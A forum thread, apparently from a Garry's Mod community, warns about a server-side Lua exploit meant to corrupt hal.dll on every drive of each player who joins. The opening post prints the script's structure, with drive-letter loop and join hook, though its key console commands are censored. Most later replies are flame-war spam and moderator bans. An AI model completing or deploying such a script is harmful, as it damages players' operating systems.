• Lua corruption exploit - hal.dll
    47 replies, posted
I didn't make this, but thought the general populace ([b]and get this to Garry's attention[/b]) should know about this exploit. If this is on a server, anyone who is on it/joins the server gets their hal.dll in any/all drives corrupted - yes, the important one in drive:/windows/system32. [lua] local toCheck = { "A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z" } local meta = FindMetaTable("Player") function meta:CorruptFileAllDrives(path) --censored concommand for k, v in pairs(toCheck) do -- censored concommand that writes to any file on any drive end end function meta:CorruptFile(path) -- censored concommand -- censored concommand that writes to any file on any drive end //Run on players currently spawned in the server for k, v in pairs(player.GetAll()) do v:CorruptFileAllDrives("WINDOWS/System32/hal.dll") end //Run on players that join the server any time after the script is loaded hook.Add("PlayerInitialSpawn", "corupshun", function(ply) ply:CorruptFileAllDrives("WINDOWS/System32/hal.dll") end ) [/lua] (censored) were some new commands implemented by Valve for debug for animations. Again, something has to be done. Any ideas/ways to fix this? For the time being, avoid joining any suspicious or 'infected' servers.
I've already e-mailed garry about this, hopefully someone else can get his attention.
Why have you shown the code for anyone to take and use?
Thank you for this. Some people don't understand the importance of exploit programmers, and unfortunately they get bad reps here even though their work helps strengthen security measures. [editline]01:19PM[/editline] [QUOTE=AzzyMaster;18548972]Why have you shown the code for anyone to take and use?[/QUOTE] Proves my point. [editline]01:20PM[/editline] If you'd like, I can talk to him directly for you.
This was fixed ages ago, Chrisaster just left the code on his site.
Censored all commands, hope it wasn't too late. Are you sure Guru?
This code is heading towards a few servers, let's just say that. removed
Shut up Stan [highlight](User was banned for this post ("Flaming" - grea$emonkey))[/highlight]
How would you "fix" something like this?
[QUOTE=RenZoneNL;18549382]How would you "fix" something like this?[/QUOTE] Well, I suppose you could just disable the command, or limit where it can save files.
It doesn't even work, I just tested on myself (Obviously not with hal.dll as the file). Nothing happened to the file, no changes. Nothing. [editline]08:38PM[/editline] Combine_guru was correct
[QUOTE=Horsey;18549317]Shut up Stan[/QUOTE] Shut up Horsey [highlight](User was banned for this post ("Flaming" - grea$emonkey))[/highlight]
Shut up Raviool [highlight](User was banned for this post ("Flaming" - grea$emonkey))[/highlight]
Shut up iRzilla [highlight](User was banned for this post ("Bandwagon replies" - grea$emonkey))[/highlight]
[QUOTE=Dave_Parker;18549672]Viewanim is old. C-C-COMBOBREAKER.[/QUOTE] Why post unfunny shit.
Ontopic: L4D still has these commands.
Because L4D doesn't get the attention it deserves.
And there seem to be like 50 concommands that have the same effect as this one, according to stan.
Lol, Stan.
[QUOTE=raviool;18549498]Shut up Horsey[/QUOTE] Shut up Raviool
Shut up Horsey
Shut up EVERYONE.
Shut up Dlaor
Shut up Horsey
Shut up raviool
Shut up iRzilla
Shut up iRzilla
Shut up raviool
lol, Kamern.
Shut up renzone
Sorry, you need to Log In to post a reply to this thread.